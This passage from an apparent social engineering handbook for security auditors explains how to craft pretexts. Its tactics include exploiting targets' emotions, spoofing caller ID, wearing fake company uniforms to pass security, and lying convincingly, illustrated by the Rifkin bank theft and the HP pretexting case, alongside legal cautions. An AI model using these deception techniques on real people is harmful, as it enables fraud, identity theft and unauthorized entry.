This principle is self-explanatory, but it can’t be said enough—the level of success is directly connected to the level and depth of research. As discussed in Chapter 2, it is the crux of successful social engineering. The more information a social engineer holds the more chances he or she has of developing a pretext that works. Remember the story I told in Chapter 2 about my mentor Mati Aharoni and how he convinced a high-level executive to visit his “stamp collection” site online? At first glance, the path inside that company might have seemed to be something to do with financial, banking, fund raising, or something along those lines because it was a banking facility. The more research Mati did, the clearer it became that the pretext could be a person who was selling a stamp collection. Finding out what the executive’s interests were allowed Mati to find an easy way into the company, and it worked.

Sometimes those little details are what make the difference. Remember, no information is irrelevant. While gathering information, it is also a good idea to look for stories, items, or aspects of a personal nature. Using a target’s personal or emotional attachments can enable you to get a foot in the door. If the social engineer finds out that every year the CFO donates a sizable sum to a children’s cancer research center, then a pretext that involves fund raising for this cause could very likely work, as heartless as it sounds.

The problem is that malicious social engineers use pretexts that feed on emotions without a second thought. After the attacks on the Twin Towers in New York City on September 11, 2001, many malicious hackers and social engineers used the losses of these people to raise funds for themselves via websites and emails that targeted people’s computers and fake fund raisers that obtained funds from those with a giving heart. After the earthquakes in Chile and Haiti in 2010, the same things occurred where many malicious social engineers developed websites that were positioned as giving out information on the seismic activity or the people who were lost. These sites were encoded with malicious code and hacked people’s computers.

This is even more evident directly after the death of a movie or music star. Search engine optimization (SEO) and marketing geniuses will have the search engines pulling up their stories in a matter of hours. Along with marketers, malicious social engineers will take advantage of the increased search engine attention by launching malicious sites that feed off that SEO. Drawing people to these sites, they harvest information or infect them with viruses.

That people will take advantage of others’ misfortune is a sad fact about this world, and one of those dark corners I said you would visit in this book. As a social engineering auditor, I can use an employee’s emotions to show a company that even people with seemingly good intentions can trick a company’s employees into giving access to valuable and business-ruining data.

All these examples solidify the point that the better a social engineer’s information-gathering and research process, the better chance he has of finding some detail that will increase the chances of a successful pretext.

Involve Personal Interests to Increase Success

Using your own personal interests to increase the chances of a successful social engineering move seems very simple but it can go a long way in convincing the target that you are credible. Nothing can ruin rapport and trust faster than a person who claims to be knowledgeable about a topic and then falls short. As a social engineer, if you have never seen a server room before and have never taken a computer apart, trying to play the part of a technician can be a quick path to failure. Including topics and activities in your pretext that you are interested in gives you a lot to talk about and gives you the ability to portray intelligence as well as confidence.

Confidence can go a long way toward convincing the target you are who you say you are. Certain pretexts require more knowledge than others (for instance, stamp collector versus nuclear researcher) to be convincing, so again research becomes the recurring theme. Sometimes the pretext is simple enough that you can get the knowledge by reading a few websites or a book.

However you gain the knowledge, researching topics that personally interest you, as the social engineer, is important. After you pick up on a story, aspect, service, or interest that you have a lot of knowledge in or at least feel comfortable discussing, see whether that angle can work.

Dr. Tom G. Stevens, PhD, says, “It is important to remember that self-confidence is always relative to the task and situation. We have different levels of confidence in different situations.” This statement is very important, because confidence directly links to how others view you as a social engineer. Confidence (as long as it is not overconfidence) builds trust and rapport and makes people feel at ease. Finding a path to your target that offers you the chance to talk about topics you are comfortable with, and that you can speak about with confidence, is very important.

In 1957 psychologist Leon Festinger came up with the theory of cognitive dissonance. This theory states that people have a tendency to seek consistency among their beliefs, opinions, and basically all their cognitions. When an inconsistency exists between attitudes and behaviors, something must change to eliminate the dissonance. Dr. Festinger states that two factors affect the strength of the dissonance:

  • The number of dissonant beliefs
  • The importance of each belief

He then stated that three ways exist to eliminate dissonance (which should cause every social engineer’s ears to perk up):

  • Reduce the importance of the dissonant beliefs.
  • Add more consonant beliefs that outweigh the dissonant ones.
  • Change the dissonant beliefs so they are no longer inconsistent.

How does a social engineer use this information? Approaching a pretext with a lack of confidence when your pretext says that you should be confident automatically creates dissonance. This dissonance raises all sorts of red flags and puts up barriers to rapport, trust, and forward motion. These barriers affect the behavior of the target, who then has to balance out her feelings of dissonance, and that kills any likelihood of your pretext working.

One of the methods to counter that is to add more consonant beliefs so that they outweigh the dissonant ones. What would the target expect of your pretext? Knowing that will allow you to feed their minds and emotions with actions, words, and attitudes that will build the belief system and outweigh any beliefs that might bring in doubt.

Of course, a skilled social engineer can also change the dissonant beliefs so they are no longer inconsistent. Although this is trickier, it is a powerful skill to have. It is possible that your appearance does not fit what the target might envision for your pretext. You might think back to the show Doogie Howser, M.D. Doogie’s problem was that his “pretext” of being a top doctor never fit since he was so young. That was a dissonant belief, but his knowledge and actions often brought that into the consonant beliefs of his “targets.” Just like the previous example, a social engineer can align his pretext with the target’s beliefs by their attitudes, actions, and especially their knowledge of the pretext.

One example of this I recently saw in real life was at Defcon 18. I was part of the team that brought the Social Engineering CTF to Defcon. We saw many contestants who used the pretext of an internal employee. When presented with an objection like, “What is your employee badge number?” an unskilled social engineer would get nervous and either not have an answer or hang up, whereas a skilled social engineer would bring those dissonant beliefs into alignment for the target. By simply stating a badge number they had found online, or by using another method, they were able to convince the target that the information was not needed, thereby aligning the target with their beliefs.

These points are very technical answers to a very simple problem, but you must understand that one can do only so much faking. Choose your path wisely.

Practice Dialects or Expressions

Learning to speak in a different dialect cannot be glanced over quickly. Depending on where you live, learning to speak a different dialect or with an accent can take some time. Putting on a southern drawl or an Asian accent can be very difficult, if not impossible. Once I was in a training class with an international sales organization and it had some statistics that said 70% of Americans prefer to listen to people with a British accent. I am not sure if that statistic is true or not, but I can say that I enjoy the accent myself. Now after that class, I heard quite a few people in the class practice their “cheerios” and “Alo Govenors,” which were horrible. I have a good friend from the UK, Jon, who gets very angry when he hears Americans trying to use lines from Mary Poppins in an imitation British accent. If he had heard this group, he might have blown a fuse.

What that class taught me was that just because the stats might say one accent is better than another for sales, or just because you may be social engineering in the South or in Europe, doesn’t mean you can easily put on the accent to make yourself appear local. When in doubt, throw it out. If you can’t make the dialect perfect, if you can’t be natural, and if you can’t be smooth, then just don’t try. Actors use vocal coaches and training sessions to learn to speak clearly in the accent they have to portray. Actor Christian Bale is from Wales, but determining that fact from listening to him is very difficult. He doesn’t sound British in most of his movies. Actor Gwyneth Paltrow took on a very convincing British accent for the movie Shakespeare in Love.

Most actors have dialect coaches who will work with them to perfect the target accent. Because most social engineers cannot afford a dialect coach, there are many publications that can help you learn at least the basics of putting on an accent, such as Dialects for the Stage by Evangeline Machlin. Although this is an older book, it contains a lot of great tips:

  • Find native examples of the accent you want to learn, to listen to. Books like Dialects for the Stage often come with audiotapes full of accents to listen to.
  • Try speaking along with the recording you have, to practice sounding like that person.
  • After you feel somewhat confident, record yourself speaking in that accent so you can listen to it later on and correct errors.
  • Create a scenario and practice your new accent with a partner.
  • Apply your accent in public to see if people find it believable.

There are innumerable dialects and accents, and I personally find it helpful to write out phonetically some of the sentences I will speak. This enables me to practice reading them and get the ideas sunk into my brain to make my accent more natural.

These tips can help a social engineer master or at least become proficient at using another dialect.

Even if you cannot master another dialect, learning expressions that are used in the area in which you are working can make a difference. One idea is to spend some time listening to people in public talk to one another. A great place for this is a diner or a shopping mall, or any place you might find groups of people sitting and chatting. Listen closely to phrases or key words. If you hear them used in a few conversations you might want to find a way to incorporate these into your pretext to add believability. Again, this exercise takes research and practice.

Using the Phone Should Not Reduce the Effort for the Social Engineer

In recent years, the Internet has come to dominate certain more “impersonal” aspects of social engineering, whereas in days past the phone was an integral part of social engineering. Because of this shift, many social engineers do not put the energy or effort into phone usage that can make it truly successful.

This topic is here to show that the phone is still one of the most powerful tools of the social engineer and the effort put into using it should not be diminished due to the impersonal nature of the Internet.

Sometimes when a social engineer plans a phone attack his thinking may differ because using the Internet might appear easier. Note that you should plan to put the same level of effort, the same level and depth of research and information gathering, and most importantly the same level of practice into your phone-based social engineering attacks. I was once with a small group that was going to practice phone presentations. We outlined the proper methods, the tone, the speed, the pitches, and the words to use. We outlined a script (more on this in a minute) and then launched a session. The first person made the call, got on the phone with someone, and messed up the first few lines. Out of complete embarrassment and fear he just hung up on the person. There is a very good lesson there—the person on the other end of the phone has no clue what you are going to say, so you can’t really “mess up.” Practice sessions can help you learn how to handle the “unknowns” caused by your accidentally altering something in your script that throws you off base.

If you are not fortunate enough to have a group to practice or hone these skills with, you will have to get creative. Try calling family or friends to see how far you can get manipulating them. Another way to practice is to record yourself as if you were on the phone and then play it back later to hear how you sound.

I personally feel that using an outlined script is very important. Here is an illustration: suppose you had to call your phone company or another utility. Maybe they messed up a bill or you had another service problem and you are going to complain. After you explain yourself to the rep, telling her how upset and disappointed you are, and the rep does absolutely nothing for you, she says something like, “XY&Z is committed to excellent service; have I answered all your questions today?” If the drone behind the phone thought for one second about what she was asking she would realize how silly it is, right? This is what happens when you use a written-out script instead of an outline. An outline allows you “creative artistic freedom” to move around in the conversation and not be so worried about what must come next.

Using the phone to solidify your pretext is one of the quickest methods inside your target’s door. The phone allows the social engineer to “spoof,” or fake, almost anything. Take into consideration this example: If I wanted to call you and pretend I was in a bustling office to add to the pretext I was trying to use, I could simply grab the audio track from Thriving Office (www.thrivingoffice.com/). This site offers a track called “Busy” and another called “Very Busy.” From the creators: “This valuable CD, which is filled with the sounds people expect to hear from an established company, provides instant credibility. It’s simple, effective, and guaranteed!”

That sentence alone is filled with social engineering goodness—filled with what people expect to hear from an established company. Already you can see that the CD is geared to fill expectations and provide credibility (at least, in the target’s mind, after his expectations are met), thereby automatically building trust.

In addition, spoofing caller ID information is relatively simple. Services like SpoofCard (www.spoofcard.com), or homegrown solutions, allow a social engineer to tell the target you are calling from a corporate headquarters, the White House, or the local bank. With these services you can spoof the number so that it appears to be coming from anywhere in the world.

The phone is a deadly tool for social engineers; developing the habits to practice using it and to treat it with utter respect will enhance any social engineer’s toolset for pretexting. Because the phone is such a deadly tool and has not lost its effectiveness, you should give it the time and effort it deserves in any social engineering gig.

The Simpler the Pretext, the Better the Chance of Success

“The simpler, the better” principle just can’t be overstated. If the pretext has so many intricate details that forgetting one will cause a social engineering failure, it is probably going to fail. Keeping the story lines, facts, and details simple can help build credibility.

Dr. Paul Ekman, a renowned psychologist and researcher in the field of human deception, cowrote an article in 1993 entitled “Lies That Fail.” In that article he says:

[t]here is not always time to prepare the line to be taken, to rehearse and memorize it. Even when there has been ample advance notice, and a false line has been carefully devised, the liar may not be clever enough to anticipate all the questions that may be asked, and to have thought through what his answers must be. Even cleverness may not be enough, for unseen changes in circumstances can betray an otherwise effective line. And, even when a liar is not forced by circumstances to change lines, some liars have trouble recalling the line they have previously committed themselves to, so that new questions cannot be consistently answered quickly.

This very salient point explains clearly why simple is better. Trying to remember a pretext can be almost impossible if it is so complex that your cover can be blown by a simple mistake. The pretext should be natural and smooth. It should be easy to remember, and if it feels natural to you, then recalling facts or lines used previously in the pretext will not be a task.

To illustrate how important it is to remember the small details I want to share a story with you. Once upon a time I tried my hand at sales. I was placed with a sales manager to learn the ropes. I can recall my first call with him. We drove up to the house, and before we left the car he looked at the info card and told me, “Remember, Becky Smith sent in a request card for supplemental insurance. We will present the XYZ policy. Watch and learn.”

In the first three minutes of the sales call he called her Beth and Betty. Each time he used the wrong name I saw her demeanor change and then she would say quietly, “Becky.” I feel we could have been giving away gold bullion and she would have said no. She was so turned off that he couldn’t get her name right that she was not interested in listening to anything.

This scenario really drives home the point of keeping the simple facts straight.

In addition to remembering the facts, it is equally important to keep the details small. A simple pretext allows for the story to grow and the target to use their imagination to fill the gaps. Do not try to make the pretext elaborate, and above all, remember the tiny details that will make the difference in how people view the pretext.

On the other hand, here is an interesting tidbit: a popular tactic used by famous criminals and con men is to purposely make a few mistakes. The thought is that “no one is perfect,” and a few mistakes make people feel at home. Be cautious about what types of mistakes you decide to make if you employ this tactic, because it does add complexity to your pretext, but it does make the conversation seem more natural. Use this tip sparingly; however you decide to proceed, keep it simple.

Let me tie all this together with a few examples that I have used or seen used in audits. After some excellent elicitation on the phone, a nameless social engineer had been given the name of the waste removal company. A few simple Internet searches and he had a usable and printable logo. There are dozens of local and online shops that will print shirts or hats with a logo on it.

A few minutes of aligning things on a template and he ordered a shirt and ball cap with the logo of the waste company on it. A couple days later, wearing the logo-laden clothing and carrying a clipboard, the social engineer approached the security booth of the target company.

He said, “Hi, I’m Joe with ABC Waste. We got a call from your purchasing department asking to send someone over to check out a damaged dumpster in the back. The pickup is tomorrow and if the dumpster isn’t repairable I will have them bring out a new one. But I need to run back there and inspect it.”

Without blinking, the security officer said, “OK, you will need this badge to get onsite. Just pull through here and drive around the back and you will see the dumpsters there.”

The social engineer had a free pass to perform a very long and detailed dumpster dive but wanted to maximize his potential so went in for the kill with this line. While looking at his clipboard he said, “The note says it is not the food dumpsters but one of the ones where paper or tech trash goes. Which block are those in?”

“Oh, just drive the same way I told you and they are in the third bay,” replied the security guard.

“Thanks,” said Joe.

It was a simple pretext, backed up by clothing and “tools” (like the clipboard), and the storylines were simple to remember and not complex. The simplicity and lack of detail actually made this pretext more believable, and it worked.

Another very widely used pretext is that of the tech support guy. This one only requires a polo shirt, pair of khakis, and small computer tool bag. Many social engineers employ this tactic to get in the front door because the “tech guy” is usually given access to everything without supervision. The same rules apply: keeping the storyline simple will help make this particular pretext very real and believable.

The Pretext Should Appear Spontaneous

Making the pretext appear spontaneous goes back to my point on using an outline versus using script. Outlines will always allow the social engineer more freedom and a script will make the social engineer sound too robotic. It also ties in to using items or stories that interest the social engineer personally. If every time someone asks you a question or makes a statement that requires you to think, and you go, “Ummmm” and start to think deeply, and you cannot come back with an intelligent answer, it will ruin your credibility. Of course many people think before they speak, so this is not about having the answer in one second, but about having an answer or a reason for not having the answer. For example, in one phone call I was asked for a piece of information I didn’t have. I simply said, “Let me get that.” I then leaned over and made it sound like I was yelling for a workmate: “Jill, can you please ask Bill to give me the order form for the XYZ account? Thanks.”

 

Then as “Jill” was getting the paper for me I was able to obtain the data I needed and the paper was never brought up again.

 

I have compiled a small list of ways that you can work on being more spontaneous:

 
 
     
  • Don’t think about how you feel. This point is a good one, because often in a pretext if you overthink you will start to add emotion into the mix, which can cause fear, nervousness, or anxiety, all of which lead to failure. On the other hand, you might not experience nervousness or fear, but over-excitement, which can also cause you to make a lot of mistakes.
  • Don’t take yourself too seriously. Of course, this is great advice in life, but it applies wonderfully to social engineering. As a security professional you have a serious job; this is a serious matter. But if you’re not able to laugh at your mistakes, you may clam up or get too nervous to handle a small bump in the road. I am not suggesting you take security as a joke. In your mind, though, if you view a potential failure as the pinnacle of failure in your life, the pressure you create can cause just what you fear the most. Minor failures can often lead to greater success if you have the ability to roll with it.
  • Learn to identify what is relevant. I like to phrase this concept as, “Get out of your head and into the world,” which is more great advice. A social engineer may be trying to plan three steps ahead and in the meantime miss a vital detail that can cause the pretext to fall apart. Be quick to identify the relevant material and information around you, whether it is the target’s body language, words spoken, or microexpressions (see Chapter 5 for more on this topic), and assimilate the information into the attack vector.

    Also keep in mind that people can tell when someone isn’t really listening to what they are saying. Getting the feeling that even unimportant sentences are falling on deaf ears can be a massive turnoff for many people. Everyone has experienced being with someone who just didn’t seem to care what he or she was saying. Maybe that person even had a legitimate reason to be thinking on a different path, but doing it is still a turnoff.

    Be sure to listen to what your target is saying. Pay close attention and you will pick up the details that are very important to them, and in the meantime you might hear something to help you in your success.

  • Seek to gain experience. This concept goes back to what you will probably see repeated four million times in this book—practice. Gaining experience through practice can make or break the pretext. Practice spontaneity with family and friends and total strangers with absolutely no goal in mind but to be spontaneous. Strike up conversations with people, but not in a scary stalker kind of way—simple little conversations can go a long way toward making you feel comfortable being spontaneous.

These points can definitely give a social engineer the upper hand when it comes to pretexting. Having the ability to appear spontaneous is a gift. Earlier in this chapter I mentioned my interview with Tom Mischke, who had an interesting take on spontaneity. He said he wants to give the illusion of spontaneity wrapped in practice and preparation. He would practice so much that his pretext would come out as a spontaneous generation of humor and talent.

 

Provide a Logical Conclusion or Follow-through for the Target

 

Believe it or not, people want to be told what to do. Imagine if you went to a doctor and he walked in, checked you over, wrote some things on his chart, and said, “Okay; see you in a month.” That would be unacceptable. Even in the event of bad news, people want to be told the next step and what to do.

 

As a social engineer, when you leave the target, you may need him to take or not take an action, or you may have gotten what you came for and just need to leave. Whatever the circumstance, giving the target a conclusion or follow-through fills in the expected gaps for the target.

 

Just as if a doctor checked you over and sent you home with no directions, if you engineer your way into a facility as a tech support guy and just walk out without saying anything to anyone after cloning the database, you leave everyone wondering what happened. Someone may even call the “tech support company” and ask whether he needed to do anything, or at worst you just leave the workers wondering. Either way, leaving everyone hanging is not the way to leave. Even a simple, “I checked over the servers and repaired the file system; you should see a 22% increase in speed over the next couple of days,” leaves the targets feeling as if they “got their money’s worth.”

 

The tricky part for a social engineer is getting the target to take an action after he or she is gone. If the action is vital for completion of the social engineer audit, then you may want to take that role upon yourself. For example, in the account in Chapter 3 of my information-gathering session at the chamber of commerce event, if I wanted that target to follow up with me through email I could have said, “Here is my card; will you email me some details on Monday about XYZ?” He very well may have, or he could have gone to the office, forgotten about me completely, and the whole gig would have failed. What would be better is to say, “I would love to get some more information from you. On Monday could I perhaps call you or shoot you an email to get some more details?”

 

The requests you make should match the pretext, too. If your pretext is being a tech support guy, you won’t “order” people around with what they must and must not do; you work for them. If you are a UPS delivery person, you don’t demand access to the server room.

 

As mentioned earlier, more steps may exist for perfecting a pretext, but the ones listed in this chapter can give a social engineer a solid foundation to build a perfectly believable pretext.

 

You might be asking, “Okay, so you listed all these principles, but now what?” How can a social engineer build a well-researched, believable, spontaneous-sounding, simple pretext that can work either on the phone or in person and get the desired results? Read on.

 

Successful Pretexting

 

To learn how to build a successful pretext, take a look at a couple of stories of social engineers who used pretexts that worked and how they developed them. Eventually they did get caught, which is why these stories are now available.

 

Example 1: Stanley Mark Rifkin

 

Stanley Mark Rifkin is credited with one of the biggest bank heists in American history (see a great article about him at www.social-engineer.org/wiki/archives/Hackers/hackers-Mark-Rifkin-Social-Engineer-furtherInfo.htm). Rifkin was a computer geek who ran a computer consulting business out of his small apartment. One of his clients was a company that serviced the computers at Security Pacific Bank. The 55-floor Security Pacific National Bank headquarters in Los Angeles looked like a granite-and-glass fortress. Dark-suited guards roamed the lobby and hidden cameras photographed customers as they made deposits and withdrawals.

 

This building seemed impenetrable, so how is it that Rifkin walked away with $10.2 million and never held a gun, never touched a dollar, and never held up anyone?

 

The bank’s wire transfer policies seemed secure. They were authorized by a numerical code that changed daily and was only given out to authorized personnel. It was posted on a wall in a secure room that only “authorized personnel” had access to.

 

From the archived article mentioned previously:

 

In October 1978, he visited Security Pacific, where bank employees easily recognized him as a computer worker. He took an elevator to the D-level, where the bank’s wire transfer room was located. A pleasant and friendly young man, he managed to talk his way into the room where the bank’s secret code-of-the-day was posted on the wall. Rifkin memorized the code and left without arousing suspicion.

 

Soon, bank employees in the transfer room received a phone call from a man who identified himself as Mike Hansen, an employee of the bank’s international division. The man ordered a routine transfer of funds into an account at the Irving Trust Company in New York—and he provided the secret code numbers to authorize the transaction. Nothing about the transfer appeared to be out of the ordinary, and Security Pacific transferred the money to the New York bank. What bank officials did not know was that the man who called himself Mike Hansen was in fact Stanley Rifkin, and he had used the bank’s security code to rob the bank of $10.2 million.

 

This scenario offers much to talk about, but for now, focus on the pretext. Think about the details of what he had to do:

 
 
     
  • He had to be confident and comfortable in order to not raise suspicion for being in that room.
  • He had to have a believable story when he called to do the transfer and have the details to back up his story.
  • He had to be spontaneous enough to go with the flow with questions that might have come up.
  • He had to also be smooth enough to not raise suspicion.

This pretext had to be meticulously planned out with the utmost detail being thought through. It wasn’t until he visited a former associate that his pretext failed, and he was caught. When he was caught, people who knew him were amazed and some even said things like, “There is no way he is a thief; everyone loves Mark.”

 

Obviously his pretext was solid. He had a well-thought-out and, one would guess, well-rehearsed plan. He knew what he was there to do and he played the part perfectly. When he was in front of strangers he was able to play the part; his downfall came when he was with a colleague who knew him, and that colleague saw a news story, put two and two together, and turned Mark in.

 

Amazingly enough, while out on bail, Rifkin began to target another bank using the same scheme, but a government mole had set him up; he got caught and spent eight years in federal prison. Although Mark is a “bad guy” you can learn much about pretexting from reading his story. He kept it very simple and used the things that were familiar to him to build a good storyline.

 

Mark’s plan was to steal the money and turn it into an untraceable commodity: diamonds. To do so he would first need to be a bank employee to steal the money, then a major diamond buyer to unload the cash, and finally sell the diamonds to have usable, untraceable cash in his pocket.

 

Although his pretext did not involve elaborate costumes or speech patterns, he had to play the part of a bank employee, then a major diamond buyer, and finally a diamond seller. He changed roles maybe three, four, or five times in this gig and was able to do it well enough to fool almost everyone.

 

Mark knew who his targets were and approached the scenario with all the principles outlined earlier. Of course, one can’t condone what he did, but his pretexting talents are admirable. If he put his talents to good use he would probably make a great public figure, salesperson, or actor.

 

Example 2: Hewlett-Packard

 

In 2006 Newsweek published a very interesting article (www.social-engineer.org/resources/book/HP_pretext.htm). Basically, HP’s chairwoman, Patricia Dunn, hired a team of security specialists who hired a team of private investigators who used pretexting to obtain phone records. These hired professionals actually got in and played the roles of HP board members and parts of the press. All of this was done to uncover a supposed information leak within the ranks at HP.

 

Ms. Dunn wanted to obtain the phone records of board members and reporters (not the records from the HP facilities, but the personal home and cell phone records of these people) to verify where she supposed the leak was. The Newsweek article states:

 

On May 18, at HP headquarters in Palo Alto, California, Dunn sprung her bombshell on the board: She had found the leaker. According to Tom Perkins, an HP director who was present, Dunn laid out the surveillance scheme and pointed out the offending director, who acknowledged being the CNET leaker. That director, whose identity has not yet been publicly disclosed, apologized. But the director then said to fellow directors, “I would have told you all about this. Why didn’t you just ask?” That director was then asked to leave the boardroom, and did so, according to Perkins.

 

What is notable about this account is what is next mentioned about the topic of pretexting:

 

The HP case specifically also sheds another spotlight on the questionable tactics used by security consultants to obtain personal information. HP acknowledged in an internal e-mail sent from its outside counsel to Perkins that it got the paper trail it needed to link the director-leaker to CNET through a controversial practice called “pretexting”; Newsweek obtained a copy of that e-mail. That practice, according to the Federal Trade Commission, involves using “false pretenses” to get another individual’s personal nonpublic information: telephone records, bank and credit-card account numbers, Social Security numbers and the like.

 

Typically—say in the case of a phone company—pretexters call up and falsely represent themselves as the customer; since companies rarely require passwords, a pretexter may need no more than a home address, account number, and heartfelt plea to get the details of an account. According to the Federal Trade Commission’s Web site, pretexters sell the information to individuals who can range from otherwise legitimate private investigators, financial lenders, potential litigants, and suspicious spouses to those who might attempt to steal assets or fraudulently obtain credit. Pretexting, the FTC site states, “is against the law.” The FTC and several state attorneys general have brought enforcement actions against pretexters for allegedly violating federal and state laws on fraud, misrepresentation, and unfair competition. One of HP’s directors is Larry Babbio, the president of Verizon, which has filed various actions against pretexters.

 

(If you’re interested in exploring it, the Telephone Records and Privacy Protection Act of 2006 can be found at http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=109_cong_bills&docid=f:h4709enr.txt.pdf.)

 

The end result was that criminal charges were brought not only against Dunn, but against the consultants she hired. You may wonder, “How is that possible considering they were hired and contracted to perform these tests?”

 

Take a look at what avenues they used and what information they obtained to help answer this question. The consultants obtained the names, addresses, Social Security numbers, telephone call logs, telephone billing records, and other information of the HP board members and reporters. They actually used the Social Security number to establish an online account for one reporter and then obtained records of his personal calls.

 

Page 32 of a confidential document from Hewlett-Packard to its lawyer and internal legal staff (www.social-engineer.org/resources/book/20061004hewlett6.pdf) lists a communication from Tom Perkins to the HP board members that offers a little more insight about what pretexts were used. A few tactics used were:

 
 
     
  • They represented themselves as the carrier company to obtain the records of calls illegally.
  • The identities of the ones being investigated were used and spoofed to obtain their personal call records.
  • Online accounts with carriers were generated using illegally obtained names, Social Security numbers, and other information to access their call records.

On September 11, 2006, the United States House of Representatives Committee on Energy and Commerce sent Ms. Dunn a letter (see a copy of this letter at www.social-engineer.org/resources/book/20061004hewlett6.pdf) requesting the information she had obtained. They listed in their requests the obtained information as the following:


 
 
     
  • All published and non-published telephone numbers
  • Credit card bills
  • Customer name and address info
  • Utility bills
  • Pager numbers
  • Cell numbers
  • Social Security numbers
  • Credit reports
  • Post office box information
  • Bank account information
  • Asset information
  • Other consumer information

All of this information was obtained through a very gray area of professional social engineering: is what they did ethical and moral, even though they were hired to do it? Many professional social engineers would not go to these lengths. The lesson to be learned from this very important case is that as a professional social engineer you might mimic the methodologies and the thinking of malicious social engineers, but never should you stoop completely to their levels. The problem with these consultants came in that they were authorized to pretext, social engineer, and audit Hewlett-Packard. They were not authorized to social engineer AT&T, Verizon, utility companies, and so on. When employing pretexting you must have it outlined and planned so you know what legal lines you might get near and what lines you must not cross.

 

HP’s story lends itself to a discussion about policy, contracts, and outlining what you will be offering if you are a social engineer auditor, but these topics are not within the context of this chapter. Using the principles outlined so far in this chapter can help you make decisions that will keep you out of trouble.

 

The danger with malicious pretexting is the threat of identity theft, which makes it a very valid part of a social engineer pentest. Testing, checking, and verifying that your client’s employees will not fall for the methods used by malicious social engineers can go a long way in safeguarding you from a successful pretexter.

 

Staying Legal

 

In 2005 Private Investigator Magazine was granted an interview with Joel Winston, Associate Director of the Federal Trade Commission (FTC), Division of Financial Practices. His office is in charge of regulating and monitoring the use of pretexting (see a copy of this valuable article at www.social-engineer.org/resources/book/ftc_article.htm).

 

Here are some of the key points from this interview:

 
 
     
  • Pretexting, according to the FTC, is the obtaining of any information from a bank or consumer, not just financial information, using fraud, deception, or misleading questions to obtain such information.
  • Using already-obtained information to verify that a target is a target, even while using false pretenses, is legal under the FTC’s definition of pretexting, unless the social engineer is using this information to obtain information from a financial institution.
  • Acquiring toll phone or cellular records through deceptive business practices is considered illegal pretexting.

The FTC website provides some clarity and additional information to this interview:


 
 
     
  • It is illegal for anyone to use false, fictitious, or fraudulent statements or documents to get customer information from a financial institution or directly from a customer of a financial institution.
  • It is illegal for anyone to use forged, counterfeit, lost, or stolen documents to get customer information from a financial institution or directly from a customer of a financial institution.
  • It is illegal for anyone to ask another person to get someone else’s customer information using false, fictitious, or fraudulent statements or using false, fictitious, or fraudulent documents, or forged, counterfeit, lost, or stolen documents.

Although the FTC’s focus is on financial institutions, the guidelines outlined are a reminder of what is considered illegal in the United States. Professional social engineers would do well to look into their local laws and make sure they are not breaking them. In 2006, the Federal Trade Commission moved to expand Section 5 of the FTC Act to specifically include a law banning the use of pretexting to retrieve telephone records.

 

HP’s pretexting situation ended in one of the private investigators being charged with conspiracy and federal identity theft—very serious charges.

 

Keeping pretexting legal will entail some research on the part of the professional social engineer as well as a clearly defined and signed-off plan of what pretexts, if any, will be used.

 

Despite the legal matters mentioned earlier, using a solid pretext is one of the quickest ways into a company. Pretexting is a talent all its own and, as you can see from this chapter, is not simply putting on a wig or a pair of fake glasses and pretending you are someone you are not.

 

Additional Pretexting Tools

 

Other tools exist that can enhance a pretext.

 

Props can go a long way in convincing a target of the reality of your pretext; for example, magnetic signs for your vehicle, matching uniforms or outfits, tools or other carry-ons, and the most important—a business card.

 

The power of the business card hit me when I was recently flying to Las Vegas on business. My laptop bag usually gets scanned, rescanned, then swabbed for bomb dust or whatever. I am one of those guys who doesn’t really mind the extra security precautions because they keep me from blowing up in the air, and I am happy with that.

 

Yet I realize that 90 percent of the time I am going to get extra attention from the Transportation Security Administration (TSA). On this particular trip I had forgotten to take my lock picks, RFID scanner, four extra hard drives, bump keys (see Chapter 7), and a plethora of wireless hacking gear out of my carry-on laptop bag. As it goes through the scanner I hear the lady working the x-ray say, “What the heck?”

 

She then calls over another gentleman who stares at the screen and says, “I have no clue what the heck that stuff is.” He then looks around, sees my smiling face, and says, “Is this you?”

 

I walk over to the table with him as he is emptying my RFID scanner and my large case of lock picks and he says, “Why do you have all of these items and what are they?”

 

I had nothing planned but decided at the last second to try this move: I pulled out a business card and said, “I am a security professional who specializes in testing networks, buildings, and people for security holes. These are the tools of my business.” I said this as I handed him a business card and he looked at it for about five seconds and then said, “Oh, excellent. Thanks for the explanation.”

 

He neatly put all my items back in, zipped the bag up, and let me go. Usually I go through the bomb screening, the little dust machine, and then a patdown, but this time all I got was a thank you and a quick release. I began to analyze what I did differently than normal. The only difference was that I had given him a business card. Granted, my business card is not the $9.99 special from an online card printer, but I was amazed that what seemed to have happened was that a business card added a sense of license to my claims.

 

My next four flights I purposely packed every “hacking” device into my bags I could find and then kept a business card in my pocket. Each time my bag was examined and I was asked about the contents, I flipped out the card. Each time I was apologized to, had my items packed in neatly, and let go.

 

Imagine my experience was a pretext. Little details can add so much weight to what I am saying that I can appear valid, trustworthy, and solid with nothing more than a card that tells people that everything I say is true. Don’t underestimate the power of a business card. One word of caution: getting a weak and pathetic-looking business card can actually cause the opposite effect. A business card that was “free” with an advertisement on the back will not add weight to a professional pretext. Yet there is no reason to spend $300 on a business card to use once. Many online business card printers can print a small amount of very nice cards for less than $100.

 

Another reason to take this chapter very seriously is that pretexting is very often the first step used by professional identity thieves. Because identity theft has lately taken a front-row seat in the crime industry, knowing what it is and how to identify it is important for consumers, businesses, and security professionals. If you are a security auditor you must help your clients become aware of these threats and test them for possible weaknesses.

Summary

In addition to extensively covering pretexting and providing real-world examples of pretexting in action, this chapter also continually brushed up against the psychological principles that affect different aspects of pretexting. The logical next stop on the framework covers just that—the mental skills that professional social engineers use that make them seem like mind control masters and that give each social engineer a huge leg up in success.

Chapter 5

Mind Tricks: Psychological Principles Used in Social Engineering

It all depends on how we look at things, and not on how they are themselves.

—Carl Gustav Jung

In Hollywood movies and television shows, con men and law enforcement are portrayed with almost mystical talents. They have the ability to get away with anything; they seem to be able to just look into the eyes of a person and tell whether they are lying or telling the truth. It is not uncommon to see situations like this: the cop looks into the eyes of his suspect and can automatically tell whether he is lying or telling the truth, or with just the power of suggestion the con man’s targets hand over their life’s savings. Movies might have you believing that manipulation tactics and getting people to do anything you want are plausible or even easy. Are these scenarios really fiction? Is it possible to gain such abilities, which seem reserved for fantasy in the movies?

This chapter could be a book unto itself, but I will condense this information down to principles that will truly change the way you interact with people. Some of the topics in this chapter are based on research done by the brightest minds in their respective fields. The techniques discussed in these topics were tested and put through their paces in social engineering environments. For example, the topic of microexpressions is based on the research of the world-renowned psychologist and researcher Dr. Paul Ekman, who used his genius to develop techniques for reading facial expressions that can literally change the way law enforcement, governments, doctors, and everyday people interact with others.
